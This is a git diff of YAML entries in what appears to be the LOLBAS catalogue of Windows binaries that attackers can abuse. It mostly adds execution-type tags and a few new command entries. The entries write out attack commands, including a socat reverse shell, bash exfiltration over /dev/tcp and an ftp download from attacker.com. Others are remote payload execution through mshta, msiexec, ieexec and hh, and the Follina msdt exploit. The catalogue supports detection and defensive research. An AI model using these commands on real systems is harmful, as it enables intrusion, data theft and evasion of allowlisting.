diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 909f7aa..2556476 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index eb9743c..80c5faa 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -11,6 +11,8 @@ Commands: Privileges: Local Admin MitreID: T1053.002 OperatingSystem: Windows 7 or older + Tags: + - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index dff3368..d8f5064 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\Atbroker.exe - Path: C:\Windows\SysWOW64\Atbroker.exe diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index d257f75..ec33fe0 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" Description: Executes a reverseshell Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' Description: Exfiltrate data Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD - Command: bash.exe -c calc.exe Description: Executes calc.exe from bash.exe Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\bash.exe - Path: C:\Windows\SysWOW64\bash.exe diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 903ec73..5bd76aa 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -21,7 +21,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Input: INF + - Execute: INF + - Execute: Remote Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 2ee2b75..cd076da 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 7f4e162..a486458 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -13,6 +13,15 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Command: control.exe c:\windows\tasks\evil.cpl + Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) + Usecase: Use to execute code and bypass application whitelisting + Category: Execute + Privileges: User + MitreID: T1218.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 69d11cb..7390b35 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 2a1cb9d..ab8ca26 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOnce + - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index 7fb9a18..c54501f 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1003.003 OperatingSystem: Windows server + Tags: + - Execute: CMD - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows server + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 27f0d01..613ce76 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows server Tags: - Execute: DLL + - Execute: Remote Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e3328c1..378d7c2 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -46,7 +46,6 @@ Commands: Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index e0a46a3..d8beeea 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: .NetObjects Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 829f2f8..1c0e2ff 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 51a084c..a236872 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 63ef859..e4b38ed 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 62b9a82..6b4828b 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index fba5f6f..3ac6adc 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index f6db470..27af482 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Application: GUI - Command: HH.exe c:\windows\system32\calc.exe Description: Executes calc.exe with HTML Help. Usecase: Execute process with HH.exe @@ -18,6 +21,20 @@ Commands: Privileges: User MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Application: GUI + - Command: HH.exe http://some.url/payload.chm + Description: Executes a remote payload.chm file which can contain commands. + Usecase: Execute commands with HH.exe + Category: Execute + Privileges: User + MitreID: T1218.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: CHM + - Execute: Remote Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 461fbca..80c6cc5 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index b1d47d4..056e30e 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 0987d2b..f397b37 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: EXE (.NET) - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -18,6 +21,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 4c86688..d0f129a 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -11,6 +11,8 @@ Commands: Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 40d9a44..c9f29fe 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -22,8 +22,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index b4e7198..3a5f5a6 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index c26c0c2..cd12895 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: XOML - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,6 +30,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7dfdb8d..dab5e49 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: COM - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 62d95ff..04ff916 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CSharp - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CSharp - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -35,7 +39,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1036 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 56b2a4f..f8c829e 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index ed0a601..e681104 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -31,6 +33,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: CMD Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 2844303..d0cc16d 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 8a3de9f..eb8167d 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -12,7 +12,8 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: HTA + - Execute: Remote - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -20,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: VBScript - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code @@ -27,6 +30,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream @@ -35,7 +40,7 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - - Execute: WSH + - Execute: HTA - Command: mshta.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 35a97e4..7de2d33 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -27,6 +32,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -36,6 +42,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -43,6 +50,10 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: MST + - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 8a8ee40..7162943 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file @@ -20,6 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: DLL + - Execute: Remote - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files @@ -27,6 +30,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\pcalua.exe Detection: diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index de15d07..cf36bb6 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pcwrun.exe /../../$(calc).exe Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\pcwrun.exe Detection: diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 1da2ab6..5c45cce 100644 --- a/yml/OSBinaries/Pnputil.yml +++ 